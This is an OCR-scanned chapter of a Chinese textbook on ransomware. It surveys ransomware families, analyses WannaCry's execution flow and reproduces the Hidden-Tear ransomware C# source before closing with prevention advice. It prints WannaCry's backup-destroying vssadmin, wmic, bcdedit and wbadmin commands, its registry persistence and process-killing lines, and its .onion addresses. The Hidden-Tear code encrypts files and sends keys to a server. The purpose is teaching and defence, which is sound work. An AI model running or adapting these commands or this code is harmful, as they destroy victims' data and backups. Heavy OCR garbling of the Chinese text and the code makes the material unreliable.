型 恶意 代码 ,受害 者 想 解 密 除 了 文 付 赎金 还 要 ”为 虎 作 供 ”, 需 要 加 其 他 人 发 送 恶意 链接 ,再 感 
染 至 少 两 名 新 的 受害 者 。 这 种 策略 就 像 * 传 销 ?一 样 ,将 越 来 越 多 的 无 率 者 打 入 病毒 产业 黑 网 。 


8.2.3 最 新 勒索 型 恶意 代码 实例 


2016 一 2017 年 度 最 新 勒索 型 恶意 代码 如 下 。 
1. HadesLocker 


恶意 代码 分 析 系 统 捕 获 到 一 类 由 C# 语 言 编写 的 新 的 敲诈 勒索 木马 。 之 前 出 现 的 C# 
语言 编写 的 木马 只 是 简单 地 调用 了 一 些 C# 库 来 辅助 开发 。 与 之 相 比 ,这 次 的 变种 增加 了 
多 层 骨 套 解密 动态 反射 调用 等 复杂 手段 ,外 加 多 种 混淆 技术 ,提升 了 分 析 难 度 。 

HadesLocker 是 2016 年 10 月 新 爆发 的 一 个 敲诈 勒索 类 木马 ,会 加 密 用 户 特定 扩展 名 
的 文件 ,包括 本 地 驱动 器 和 网 络 驱 动 器 ,加 密 后 文件 扩展 名 为 . 一 HL 加 5 个 随机 字符 ,然后 
生成 TXT、HTML、PNG 3 种 形式 的 文件 来 通知 用 户 支 付 赎金 ,桌面 背景 也 会 被 改 为 生成 
的 PNG 文件 。 

2. Zepto(Lock 变种 ) 


Zepto 是 2016 年 6 月 底 出 现 的 恶意 代码 ,该 恶意 代码 与 知名 勒索 型 恶意 代码 家 族 
Locky 有 紧密 联系 。Zepto 通过 钓鱼 邮件 传播 ,邮件 中 附带 一 个 . zip 格式 的 压缩 包 , 其 中 包 
含 恶 意 的 .js JavaScript 脚本 文件 。 一 旦 执行 ,受害 者 的 文件 资料 会 被 勒索 型 恶意 代码 使 用 
RSA 算法 加 密 ,并 会 在 后 级 名 中 增加 . zepto 字符 串 。 

3。Petya 

Petya 最 初 被 安全 公司 趋势 科技 发 现 。 它 的 标志 就 是 "死亡 红 屏 ”。 在 成 功 渗透 进入 
Windows 系统 之 后 ,木马 会 强迫 用 户 重启 计算 机 。 而 重启 之 后 ,计算 机 就 再 也 进入 不 了 
Windows 了 ,而 是 会 自动 加 载 一 个 勒索 页 面 , 癌 受 害 者 索要 0. 99 比特 币 的 赎金 。 

然而 ,这 个 时 候 如 果 急 于 支付 赎金 ,就 太 冤 了 。 经 过 分 析 , 安 全 人 员 发 现 了 这 个 木马 是 
由 “偷懒 的 黑客 ”设计 的 。 它 虽然 看 起 来 凶恶 得 无 以 复 加 ,但 实际 上 只 修改 了 系统 的 引导 记 
录 以 及 加 密 了 主 文件 表 , 真 正 的 文件 还 原封 不 动 地 存在 于 磁盘 中 。 
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8.2.4 勒索 型 恶意 代码 加 密 算 法 


加 密 算 法 是 勒索 型 恶意 代码 核心 技术 之 一 。 如 末 加 密 算 法 容易 被 破解 ,那么 勒索 方 就 
没 办 法 赚 到 赎金 ,所 以 ,勒索 病毒 的 制作 者 都 布 望 把 加 密 算 法 做 到 足够 强大 ,让 受害 者 无 法 
破解 。 一 般 勒 索 型 恶意 代码 第 用 的 加 密 方 法 如 表 8-1 所 示 。 


表 8-1 勒索 型 恶意 代码 常用 加 密 方 法 


CryptoWall Lockey, Petya Unlocko2 
Cerber, CTB Locker, TeslaCryp 


如 表 8-1 所 示 ,除了 Apocalypse 勒索 病毒 使 用 了 月 定义 的 算法 ,大 多 数 勒 索 型 恶意 代 
码 使 用 了 标准 的 加 密 算 法 。 在 所 有 加 密 算法 中 ,AES 算法 被 使 用 得 最 多 ,其 次 是 RSA 算 
法 ,部 分 勒索 病毒 也 使 用 了 ECDH 算法 。 

由 于 这 些 标准 加 密 算 法 被 认为 是 无 法 破解 的 ,而 部 分 勒索 病毒 可 以 被 破解 的 最 大 原因 
是 因为 标准 加 密 算 法 使 用 不 当 。 例 如 ,WannaCry 勒索 病毒 爆发 后 就 被 发 现存 在 加 密 漏 洞 ， 
并 被 诸多 安全 厂商 推出 了 文件 恢复 工具 ,帮助 受害 者 成 功 恢复 数据 。 


ww 入 


8.3 ”WannaCry 恶意 代码 分 析 


全 球 主流 的 勒 案 型 恶意 代 人 码 家 族 ( 类 型 ) 有 75 种 之 多 。 据 360 互联 网 安全 中 心 监 测 显 
示 ，Cerber、Locky 和 XTBL 是 目前 最 主流 的 三 大 勒索 恶意 代码 家 族 。 其 中 ,Cerber 占 比 为 
48.0% ,Locky 占 比 为 20% ,XTBL 占 比 为 9.0% (图 8-2)。 本 节 接 下 来 主要 分 析 其 中 的 
WannaCry ,该 病毒 使 用 了 著名 的 “永恒 之 蓝 ” 漏 洞 。 


8-2 勒索 型 恶意 代码 分 布 情况 
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2017 年 5 月 12 日 ,爆发 了 WannaCry 勒索 病毒 安全 事件 。 此 病毒 利用 微软 操作 系统 
MS17-010 漏洞 (永恒 之 蓝 ) 在 全 球 范 围 进 行 大 规模 传播 ,至少 有 99 个 国家 超过 20 万 台 计 算 
机 主机 遭受 到 攻击 。 我 国 作 为 全 球 互联 网 用 户 最 多 的 国家 ,也 深 受 此 次 病毒 事件 的 危害 。 
WannaCry 勒索 病毒 的 爆发 ,是 继 “ 冲 击 波 ”“ 震 荡 波 ”之 后 又 一 个 全 球 性 的 恶意 代码 安全 事 
件 , 其 影响 力 、 破 坏 力 已 远 超 上 述 两 个 蠕虫 病毒 。 


8.3.1 基本 模块 
WannaCry 勒索 病毒 功能 结构 模块 如 图 8-3 所 示 。 


3 个 功能 模块 协同 联动 ,最 终 实 现 了 勒索 病毒 快速 传 
播 ,快速 感染 、 磁 盘 数 据 加 密 的 传播 攻击 链条 。 描 | 播 | 击 | 殖 | 信 | 成 | 制 


1. 蠕虫 模块 

蠕虫 模块 是 具有 传统 蠕虫 病毒 的 特征 及 核心 功能 
的 模块 ,具备 了 常见 的 主机 扫描 功能 、 端 口 及 漏洞 探测 | ”利用 MS17-010 汤 洞 (永恒 之 蓝 ) 
功能 .代码 注入 功能 、 通 信 功 能 等 模块 。WannaCry 勒 ”L 测 洞 利 用 柑 闫 
索 型 恶意 代码 会 通过 探测 扫描 方式 ,判断 Windows 主 
机 端口 SMB(v1、v2 版 本 )445 是 否 开 放 , 进 而 利用 漏洞 
校 验方 式 验 证 主机 是 否 存在 漏洞 ,为 下 一 步 Windows 
SMB 远程 代码 执行 漏洞 MS17-010 的 执行 进行 信息 图 8-3 WannaCry 的 模块 
收集 。 

2. 漏洞 利用 模块 

“永恒 之 蓝 ” 是 NSA 泄露 的 一 个 高 威胁 可 利用 漏洞 ,通过 利用 该 漏洞 ,攻击 者 会 轻松 侵 
入 操作 系统 层面 ,实现 WannaCry 病毒 的 快速 植 人 。 因 此 ,此 模块 在 整个 WannaCry 勒索 病 
毒 结 构 中 最 为 关键 , 它 是 决定 能 和 否 成 功 植 人 勒索 型 恶意 代码 的 重要 环节 。 

3. 勒索 模块 

WannaCry 勒索 病毒 主要 使 用 了 WNCRY 家 族 和 ONION 家 族 的 勒索 病毒 模块 ,该 模 
块 本 身 不 具备 主动 传播 .漏洞 利用 等 功能 。 当 病毒 借助 蠕虫 模块 “永恒 之 蓝 ? 模 块 传播 植 人 
宿主 并 被 激活 后 ,将 会 对 主机 上 的 文件 进行 加 密 , 同 时 弹出 勒索 对 话 框 ,提示 勒索 目的 及 接 
收 勒索 赃款 的 账户 信息 。WannaCry 勒索 病毒 的 攻击 流程 与 其 他 蠕虫 类 病毒 并 无 太 大 差 
异 ,主要 差别 在 于 其 攻击 载荷 使 用 了 和 较 新 的 远程 执行 代码 和 病毒 体 。 


8.3.2 详细 过 程 


WannaCry 勒索 型 恶意 代码 的 执行 流程 类 似 于 其 他 勒索 型 恶意 代码 。 它 的 特别 之 处 
是 ,首先 访问 一 个 程序 预 设 的 域名 ,这 是 一 个 开关 图 数 , 如 果 该 域名 存在 则 终止 运行 ,否则 ， 
执行 后 续 的 工作 。 判 断 之 后 ,勒索 软件 会 利用 EternalBlue( 永 恒 之 蓝 )/MS17-010 漏洞 感染 
其 他 主机 。 同 时 WannaCry 会 对 系统 进行 破坏 、. 加密 文件 .删除 备份 .显示 支付 比特 币 赎 金 
页 面 等 一 系列 工作 。 图 8-4 所 示 是 该 恶意 代码 的 执行 流程 。 
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一 、 判 断 及 感染 访问 : www.iuqerfsodp9ifja 
Posdfjhgosurijfaewrwerewe 
a.com 


关闭 进程 
生成 res 文 件 
删除 备份 


设置 SMB 连 接 

检测 MS17-010 漏 酒 

生成 Base64 利 用 代码 

仿 测 DoublePulsar 

执行 利用 代码 生成 wncryt 加 密 文件 
运行 Taskdl.exe 
持久 化 设置 
运行 Tor 

加 载 资源 ， 创 建 vy 
新 服务 创建 Please Read me.txt 


三 、 加 密 流 程 
运行 TaskStart， 技 
行 加 密 的 DLL 


一 | 准备 公 钥 准备 加 密 密 钥 
准备 Tor 匿 名 网 络 | | 打开 密码 保护 压 | | 加 密 AES 密 钥 | | 创建 锁 
加 载 比 特 币 钱包 | | 缩 包 解密 DLL 开始 加 密 文件 


二 、 准 备 勒 索 代 码 


8-4 ”WannaCry 详细 流程 图 


1. 初始 感染 和 扩散 


(1) 域名 判断 。 尝 试 访问 域名 (如 www. iugerfsodp9ifjaposdfjhgosurijfaewrwergwea. 
com) ,如 果 成 功 则 退出 恶意 代码 ,程序 终止 ,不 会 造成 任何 破坏 。 如 果 该 域名 不 存在 , 则 执 
行 后 续 步 又 。 

(2) 创建 exe 文件 ,并 以 服务 方式 运行 。 

如 果 命 令 行 args 参数 设置 为 -m security ,会 执行 如 下 操作 。 

Q@ 打开 SC 管理 器 。 

GO 创建 名 为 Microsoft Security Center (2.0) Service(mssecsvc2.0) 的 新 服务 ,对 应 执 
行文 件 为 mssecsvc. exe。 

G) 执行 服务 。 

由 加 载 tasksche. exe 源 文 件 。 

G@) 保存 为 C:\\"WINDOWS\\tasksche. exe。 

@O 将 C:\\WINDOWS\\tasksche. exe 移动 到 C:\\WINDOWS\\gqeriuwjhrf。 

如 果 参 数 不 为 \m security, 则 通过 SMB 漏洞 对 应 的 Eternal Blue / Double Pulsar 利用 
方法 来 进行 扩散 。 

Q@ 打开 SC 管理 器 。 
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@ 访问 mssecsvc2.0 服务 。 

G) 改变 服务 配置 。 

(4) 开启 Crtl Dispatcher 服务 (通过 SMB 利用 方法 运行 )。 
2. 准备 勒索 代码 

(1) 解压 zip 文件 并 准备 好 Tor 和 比特 币 信 息 。 

Q 用 硬 编码 密码 “WNery(@2017” 提 取 zip 源 文 件 XIA。 

G 得 到 包含 Tor 配置 的 c. wnry 文件 。 

G@) 从 c. wnry 中 提取 使 Tor 浏览 需 和 用 于 通信 的 详 芍 站点。 


gx7ekbenv2riucmf. onion 

57g7spgrzlojinas. onion; 
xxlvbrloxvriy2c5. onion; 
76jdd2ir2embyv47. onion; 
cwwnhwhlz52maqm7. onion; 


由 加 载 攻 击 者 设置 的 支付 赎金 的 比特 币 钱包 地 址 ,更 新 c. wnry。 

(2) 隐藏 zip 文件 的 解压 目录 并 且 修 改 安全 描述 符 。 

QO@ 建立 进程 : 运行 “attrib 十 h . ”命令 来 隐藏 当前 目录 。 

GO 执行 icacls . /grant Everyone:F /T/C /Q. 命令 ,人 允许 所 有 用 户 完 全 访问 当前 目录 
和 子 目 录 中 的 所 有 文件 。 

(3) 准备 加 密 公 和 钥 、AES 密 钥 , 解 密 动 态 链接 库 。 

Qa 使 用 getprocaddress 困 数 来 加 载 导 出 困 数 。 


CreateFileW, WriteFile, ReadFile, MoveFileW, MoveFileExW, DeleteFileW, CloseHandle 


多 设置 加 密 密 钥 。 
a. 导出 加 密 函 数 。 


CryptGenKey, CryptDecrypt, CryptEncrypt, CryptDestroyKey, CryptImportKey, CryptAcquireContextA 


b. 获取 RSA_AES 加 密 程序 

c. CryptImportKey 导入 便 编 码 的 公 和 钥 。 

d. 获取 本 机 系统 信息 以 及 执行 GetProcessHeap。 

e. 将 加 密 数 据 放 在 堆 内 存 中 。 

f. 更 改 对 于 该 内 存 位 置 的 保护 。 

(4) 运行 DLL 导出 文件 的 TaskStart 限 数 。 

(5) 创建 用 于 加 密 用 户 文 件 的 密 钥 

J 使 用 公 角 加密 用 户 的 私 钥 并 存储 在 %08X. eky 中 。 

@ 访问 %08X. dky 获取 解密 密 钥 。 

(6) 为 所 有 线程 创建 Mutex: Global\\MsWinZonesCacheCounterMutexW。 如 果 这 个 
Mutex 存在 ,恶意 软件 将 无 法 启动 ,因而 也 是 男 一 种 防范 方法 。 

(7) 创建 新 线程 ,用 于 加 密 文 件 。 使 用 CryptGenKey 生成 用 于 加 密 文件 的 AES 密 钥 ， 
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加 密 文件 。 
3. 加 密 流程 
(1) 创建 新 的 线程 ,覆盖 磁盘 上 的 文件 。 
Qa_ 生成 一 个 密 钥 。 
Q 为 每 个 文件 生成 数据 缓冲 区 。 
@ 使 用 线程 调用 StartAddress 函数 ,加 密 文 件 内 容 。 
@ 添加 . WNCRYT 后 绥 。 
(2) 在 新 线程 中 运行 新 进程 taskdl. exe。 
(3) 解密 持久 化 配置 。 
JW 读 取 配置 文件 。 
@O 找到 @ WanaDecryptor@. exe 文件 的 位 置 。 
G) 创建 进程 taskse. exe@WanaDecryptor(@. exe。 
由 设置 启动 项 在 重新 启动 时 自动 运行 。 
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 
@) 运行 命令 : 
CheckTokenMembership, GetComputerNameInfo 
@ 运行 命令 : 


cmd. exe /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "< rand>" /t REG 
Sz /d "\"tasksche. exe"\" /f 


(QD 查找 f. wnry。 

(4) 运行 @WanaDecryptor(@. exe。 

QD 读 取 Tor Client 的 配置 文件 。 

GO 运行 Tor 客户 端 。 可 以 连接 到 上 面 列 出 的 .onion 网 站 ,以便 用 户 付 款 和 跟 踩 。 
(5) 持久 化 @WanaDecryptor(@. exe, 备 份 。 

QW 通过 批 处 理 脚 本 创建 lnk 文件 @WanaDecryptor@@. exe. lnk。 


(echo off 

echo SET ow = WScript.CreateObject("WScript. Shell")> m. vbs 

echo SET om = ow. CreateShortcut("(@WanaDecrVyptor(@ . exe. lnk")>> m.vbs 
echo om. TargetPath = "(QWanaDecryptor(@® . exe">> m. vbs 

echo om. Save >> m. vbs 

cscript. exe //nologo m. vbs 

del m. vbs 


GO 写 人 名称 为 随机 整数 的 bat 文件 。 

a. 执行 bat 脚本 。 

b. 执行 删除 命令 del /a % %0。 

(6) 从 r. wnry 创建 勒索 提示 信息 @Please_Read_Me@ . txt。 
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4. 加 密 文件 


(1) 关闭 正在 运行 的 数据 库 和 邮件 服务 相关 进程 。 
QD 获取 UserName。 

@ 获取 驱动 硕 类 型 。 

@) 运行 : 

askkill. exe /f /im Microsoft. Exchange. * 

taskkill. exe /f /im MSExchange * 

taskkill. exe /f /im sqlserver. exe 


taskkill. exe /f /im sqlwriter. exe 
taskkill. exe /f /im mysqld. exe 


由 检查 磁盘 空闲 空间 。 

@) 循环 过 历 文 件 , 同 时 加 密 。 

(2) 运行 @WanaDecryptor(@. exe。 

GO 写 入 .res 文件 。 

@) 运行 Tor 服务 : taskhsvc. exe TaskData\Tor\taskhsvc. exe。 

(3) 运行 : cmd. exe /c start /b (WanaDecryptor(®. exe。 

使 用 以 下 命令 删除 卷 副本 。 

Cmd. exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} 
bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin 
delete catalog — quiet 

Cmd. exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} 


bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin 
delete catalog ~ quiet 


8.4 Hidden-Tear 源 代 码 分 析 


Hidden-Tear 是 由 土耳其 的 安全 研究 人 员 Utku Sen 在 2015 年 编写 的 一 款 勒索 型 恶意 
代码 , 它 使 用 AES 密码 算法 加 密 用 户 文 件 , 并 给 出 警告 及 勒索 信息 ,提醒 用 户 交 付 赎 金 。 
Hidden-Tear 是 一 球 开 源 的 教学 型 勒索 病毒 ,因此 , 它 只 用 于 教育 目的 ,不 要 把 它 当 作 真 正 
的 病毒 看 待 。 

读者 可 以 在 github 上 查询 到 Hidden-Tear 勒索 型 恶意 代码 的 开源 代码 ,并 根据 本 节 的 
流程 对 其 进行 分 析 与 学 习 。 该 源码 由 C# 编写 ,比较 容易 读 懂 。 


8.4.1 Hidden-Tear 的 代码 特征 


Hidden-Tear 的 作者 写 这 天 开源 病毒 的 动机 是 什么 呢 ? 大 多 数 勒 索 型 恶意 代码 是 由 汇 
编 语言 编 写 的 ,对 于 那些 熟悉 汇编 语言 的 人 来 说 , 阅 诸 分 析 这 些 代 码 并 不 那么 棘手 ,然而 对 
于 大 多 数 人 来 说 并 非 这样 ,尤其 是 对 于 新 手 来 说 。 此 外 ,网 上 并 没有 任何 适合 新 手 学 习 用 的 
勒索 软件 样本 的 源 代码 。 所 以 ,作者 的 第 一 个 动机 就 是 为 新 手提 供 一 份 源 代码 ,这 些 新 手包 
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括 试 图 理解 整个 过 程 的 学 生 。 第 二 个 动机 是 为 脚本 小 子 构建 一 个 蜜 缸 。 经 粗略 的 浏览 可 
知 ,Hidden-Tear 勒索 病毒 总 体 概况 如 下 。 

(1) 使 用 AES 加 密 算法 。 

(2) 密 钥 会 发 送 给 服务 器 端 。 

(3) 加 蜜 文件 可 以 在 解密 程序 中 输入 密 钥 后 被 解密 。 

(4) 在 桌面 生成 说 明文 件 和 警告 信息 ( 含 付款 途 径 ) 。 

(5) 程序 总 大 小 仅 12KB, 非 常 精简 。 


8.4.2 Hidden-Tear 关键 代码 分 析 


1. 代码 流程 图 

如 图 8-5 所 示 , Hidden-Tear 病毒 的 关键 步骤 包括 初始 化 、 获 取 参 数 、 窗 体 可 视 化 配置 、 
产生 随机 密码 发 送 随 机 密码 到 服务 器 .加密 根 目录 下 的 文件 .生成 警告 信息 等 。 接 下 来 的 
几 个 部 分 ,将 对 这 些 关键 模块 进行 分 析 和 解释 。 


借 rsp 

右上 站 汶 加 密 根 目录 下 
伪 随 机 数 与 3 
原始 字符 串 所 有 路 径 中 


产生 随机 密码 Oe 


获取 用 户 名 下 


目录 路 径 根 目 录 下 生成 
二 家 机 人 得 | |。| aa 文人 
容 体 图 :服务 器 行 勒索 
可 视 化 配置 全 服务 天 


8-5 _ Hidden-Tear 的 源 代 码 流 程 


2. 程序 入 口 


using System; 

using System.Collections,.Generic; 
using System.Linqg; 

using System.Threading,.Tasks; 
using System,Windows,Forms; 


namespace hidden_tear 
{ 
static class Program 


/// <summary> 

/// The main entry point for the application. 
/// </Summary> 

[STAThread] 

static void Main() 

{ 


AppLication.EnabLeVisuaLStytLes( ) ; 
Application.SetCompatibleTextRenderingDefault (false); 
Application.Run(new Form1()); 
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启用 可 视 化 设置 : Application. EnableVisualStyles(); 

使 用 GDI 方式 显示 文本 : Application. SetCompatibleTextRenderingDefault(false); 
开启 form 界面 . Application. Run(new Forml() ); 

3. 定义 参数 


//Ur\ to send encryption password and computer info 

string targetURL = "https://www.example.com/hidden-tear/write.php?info="; 
string userName = Environment.UserName; 

string computerName = System.Environment,.MachineName.ToString(); 

string userDir = "C:\\Users\\"’; 


targetURL: 传递 密 钥 和 计算 机 信息 的 地 址 。 

userName: 系统 和 应 用 程序 的 当前 用 户 。 

computerName: 本 地 计算 机 的 NetBIOS 名 称 ( 包 含 计 算 机 名 称 的 字符 串 )。 
userDir: 文件 路 径 。 

4. 窗 体 相 关 函 数 

1) 窗 体 加 载 事件 一 一 创建 时 触发 


private void Form1_Load(object sender, EventArgs e) 


0pacity = 0; 

this.ShowInTaskbar = false; 
//starts encryption at form Load 
startAction( ) ; 


| 


将 窗 体 设置 为 透明 :Opacity 二 0; 

不 在 任务 栏 上 显示 该 进程 : this. ShowInTaskbar 三 false; 
调用 startAction() 阴 数 。 

2) 窗 体 显示 事件 一 一 首次 显示 时 触发 

private void Form_Shown(object sender, EventArgs e) 

{ 


Visible 
0pacity 


false; 
100; 


隐藏 窗 体 : Visible == false; 
不 透明 : Opacity 一 100; 


5. 加 密 相 关 函 数 
1) AES 加 密 算法 


//AES encryption algorithm 
public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, bytel[] passwordBytes) 
{ 

byte[] encryptedBytes = null; 

byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 }; 

using (MemoryStream ms = new MemoryStream()) 

{ 


using (RijndaelManaged AES = new RijndaetLManaged ( ) ) 
{ 


AES. KeySize = 256; 
AES,.BlockSize = 128; 
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var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000); 

AES.Key = key.GetBytes(AES,.KeySize / 8); 

AES.IV = key.GetBytes(AES.BlockSize / 8); 

AES.Mode = CipherMode. CBC; 

using (var cs = new CryptoStream(ms, AES,.CreateEncryptor(), CryptoStreamMode.Write)) 
{ 


cs.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length); 
cs.Close(); 


} 
encryptedBytes = ms.ToArray!(); 
} 


return encryptedBytes; 


从 上 述 源 代码 可 知 ,Hidden-Tear 使 用 的 AES 特征 如 下 。 

(1) 使 用 AES-256-CBC 加 密 参 数 。 

Q 设置 密 钥 为 256 位 。 

多 加 密 操 作 块 大 小 为 128 位 。 

(2) 使 用 基于 HMACSHALI1 的 伪 随 机 数 生 成 需 , 实 现 密 钥 派生 功能 。 

J 通过 使 用 密码 、salt 值 (在 密码 任意 固定 位 置 插 入 特定 的 字符 串 让 散 列 后 的 结果 和 
使 用 原始 密码 的 散 列 结果 不 相符 ) 和 迭代 次 数 派 生 密 钥 。 

使 用 伪 随 机 密 钥 设置 加 密 密 钥 。 

@ 使 用 伪 随 机 密 钥 设置 对 称 算 法 的 初始 化 向 量 。 

@ 设置 对 称 算法 的 运算 模式 : CBC。 

a. 每 个 纯 文本 块 在 加 密 前 ,与 前 一 块 的 加 密 文 本 进行 按 位 异 或 运算 (防止 即使 有 很 多 
相同 的 块 也 不 会 被 加 密 到 相同 的 密 文 )。 

b. 初始 化 回 量 与 第 一 个 纯 文 本 块 进行 按 位 异 或 后 在 对 第 一 个 文本 块 进行 加 密 。 

c. 如 果 有 一 位 出 错 则 整个 纯 文本 块 都 会 出 错 , 紧 接着 下 一 块 的 加 密 也 会 在 同样 的 地 方 出 错 。 

(3) 使 用 CryptoStream 。 

将 当前 数据 流连 接 到 加 密 流 。 

使 用 现 有 的 key 属性 和 IV 属性 (初始 化 向 量 ) 建 立 加 密 器 对 象 。 

@) 对 加 密 流 开启 写 入 访问 权限 。 

由 将 待 加 密 的 字符 串 字 节 数 组 写 入 到 加 密 流 中 。 

(4) 将 流 内 容 写 和 人 到 返回 结果 的 字 节 数组 中 。 

2) 加 密 用 的 随机 密码 


//creates random password for encryption 
public string CreatePassword(int Length ) 


const string valid = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789@*!=&?8&/"; 
StringBuilder res = new StringBuilder(); 
Random rnd = new Random(); 
while (9 < length——)t{ 
res.Append(valid[rnd.Next(valid.Length)]); 


return res.ToString(); 
} 


使 用 伪 随 机 数 生 成 器 (依赖 时 间 的 默认 种 子 ), 生 成 不 小 于 valid 字符 长 度 的 非 负 随机 
数 。 在 valid 字 符 串 后 追加 伪 随 机 数 。 
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3) 信息 反馈 给 服务 副 端 


//Sends created password target location 
public void SendPassword(string password){ 


string info = computerName + "-" + UserName + " " + password; 
var fullUrl = targetURL + info; 
var conent = new System.Net.WebCLient(),.DowntLoadString(fuLLUrL) ; 


} 


回 服务 需 发 送 fullurl 的 请 求 , 则 服务 颖 可 以 从 该 请 求 中 得 知 信 息 与 密 钥 。 
4) 加 密 单 个 文件 

//Encrypts single file 

public void EncryptFile(string file, string password) 


{ 


byte[] bytesToBeEncrypted = File.ReadAllBytes (file); 
byte[] passwordBytes = Encoding.UTF8,.GetBytes(password); 


// Hash the password with SHA256 
passwordBytes = SHA256.Create().ComputeHash(passwordBytes); 


byte[] bytesEncrypted = AES_Encrypt (bytesToBeEncrypted, passwordBytes); 


File.WriteAllBytes (file, bytesEncrypted); 
System.I0,.File.Move(file, file+".locked"); 


加 密 单个 文件 的 步骤 如 下 。 

(1) 打开 需要 进行 读 取 的 文件 ,并 将 文件 内 容 读 入 字 节 数组 ,再 关闭 文件 。 
(2) 将 密码 从 字符 串 转 为 字 节 数组 。 

(3) 使 用 SHA256 对 密码 数组 进行 Hash 运算 。 

(4) 调用 AES 加 密 困 数 , 结 果 返 回 到 字 节 数组 中 。 

(5) 将 加 密 后 的 字 节 数组 写 和 人 原文 件 中 。 

(6) 重 命名 文件 : 添加 . locked 到 文件 名 中 。 

5) 加 密 目 录 下 的 所 有 文件 


//encrypts target directory 
public void encryptDirectory(string location, string password) 
| 


//extensions to be encrypt 
var validExtensions = new[] 


{ 
ee de” re "me i 1 te | he 
“pg ， “png ， 人 "SqL, 0D sl her “ephp' ， "asp ， 
"SN salt en Wo 

We 


string[] files = Directory.GetFiles(location); 
string[] childDirectories = Directory.GetDirectories(Location) ; 
for (int i = 0; i < files.Length; i++){ 
string extension = Path,.GetExtension(files [i]); 
if (vaLidExtensions.Contains(extension) ) 
{ 
EncryptFile(files[il],password); 


} 
for (int i = 0; i < childDirectories.Length; i++){ 
encryptDirectory(childDirectories[il],password); 
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加 密 某 个 目录 下 所 有 文件 的 步骤 如 下 。 

(1) 建立 要 加 密 文件 类 型 的 后 级 名 单 。 

(2) 获取 目录 中 各 文件 的 路 径 , 获 取 目 录 中 的 子 目 录 路 径 。 

(3) 逐个 匹配 文件 路 径 数组 中 每 个 元 素 的 后 绥 名 是 否 为 名 单 中 的 元 素 。 
Q 对 名 单 中 元 素 调 用 单个 文件 加 密林 数 。 

Go 非 名 单 中 元 素 则 跳 过 。 

(4) 递归 加 密 目 录 男 数 , 轴 历 子 目录 。 

6) 加 蜜 操作 的 人口 函数 


public void startAction() 
{ 


string password = CreatePassword(15); 
string path = "\\Desktop\\test"| 
string startPath = userDir + userName + path; 
SendPassword(password); 
encryptDirectory(startPath, password); 
messageCreator(); 
password = null; 
System.Windows.Forms.Application.Exit(); 

} 


(1) 遍历 “C:\Users\" 十 userName 十 "\Desktop\test”* 下 的 文件 进行 试验 ,实际 勒索 型 
恶意 代码 使 用 时 直接 遍历 C:\Users 下 文件 并 加 密 。 

(2) 调用 SendPassword 图 数 将 密码 和 计算 机 信息 发 送 给 服务 器 。 

(3) 调用 messageCreator() 困 数 。 

(4) 将 密码 重 置 为 NULL。 

(5) 退出 该 进程 。 

6. 告知 用 户 已 被 加 密 


public void messageCreator() 
string path = "\\Desktop\\test\\READ_IT.txt"; 
string fullpath = userDir + userName + path 
string[] lines = { "Files has been encrypted with hidden tear", 


"Send me some bitcoins or kebab", "And I also hate night clubs, desserts, being drunk." }; 
System.I0.File.writeAllLines(fullpath, lines); 


在 用 户 的 根 目 录 下 添加 txt 文件 告知 用 户 文 件 已 被 加 密 , 从 而 进行 勒索 。 
8.4.3 Hidden-Tear 加 密 的 漏洞 


由 于 Hidden-Tear 是 一 款 以 新 手 教学 为 目的 而 开发 的 勒索 病毒 ,因此 ,在 加 密 部 分 存在 
较 多 的 漏洞 。 有 经 验 的 密码 研究 人 员 一 眼 就 能 看 出 这 些 漏 洞 。 

1. 随机 算法 的 种 子 

最 重要 的 安全 漏洞 存在 于 创建 随机 加 密 密 钥 的 过 程 中 。 作 者 使 用 了 . Net 中 的 Random 类 
来 产生 随机 字符 串 。Random 类 使 用 了 Environment. TickCount( 得 到 系统 启动 以 来 经 过 的 训 
秒 数 ) 作 为 种 子 , 它 仅仅 能 够 减弱 表面 的 又 力 攻击 , 除 此 之 外 它 很 容易 预测 得 到 。 

2. 攻击 向 量 的 重用 

在 加 密 过 程 中 ,算法 对 于 每 个 文件 都 使 用 相同 的 攻击 向 量 (IV ) 。 
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3. 静态 盐 
Hidden-Tear 勒索 病毒 使 用 静态 盐 (Static Salt) 进 行 加 密 。 


byte[ ] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 }; 
4. 发 送 密 钥 


密 钥 是 通过 一 个 未 加 密 的 GET 请 求 发 送 到 服务 器 的 .如 果 当 时 网 络 正在 监听 ,那么 通过 检查 日 志 可 以 
很 容易 地 找到 密 钥 . 


//Sends created password target location 
public void SendPassword( string password) { 


string info = computerName + "一 ”+ userName + " " + password; 

Var fullUrl = targetURL + info; 

Var conent = new SVstem. Net. WebClient().DownloadString(fullUr]); 
} 


8.5 防 艺 与 应 对 稼 略 


当 计 算 机 系统 被 勒索 型 恶意 代码 感染 并 被 加 密 后 ,数据 恢复 的 难度 是 和 恶意 代码 采用 
的 加 密 算法 及 加 密 方 式 相 关 的 。 勒 索 型 恶意 代码 通 向 会 采用 高 蝇 度 加 密 方 式 加 密 系 统 文件 
其 至 包括 备份 文件 。 此 时 进行 逆 回 破解 十 分 困难 ,其 成 本 往往 超过 勒索 者 勒索 的 金额 ,试图 
去 解密 被 加 密 的 数据 或 设备 是 徒 施 的 。 由 此 可 知 ,积极 预防 ,不 留 给 勒索 型 恶意 代码 感染 的 
机 会 是 非常 重要 的 。 


8.5.1 增强 安全 意识 


1. 使 用 防护 工具 

部 署 电子 邮件 防护 产品 ,对 电子 邮件 附件 进行 病毒 扫 摘 。 应 该 对 包括 移动 终端 在 内 的 
所 有 主机 进行 防护 ,采取 的 措施 除了 安 沪 传统 的 杀毒 软件 外 ,还 应 包括 补丁 管理 .Web 内 容 
过 滤 以 及 主动 防护 类 的 病毒 防护 产品 等 。 

2. 慎重 下 载 

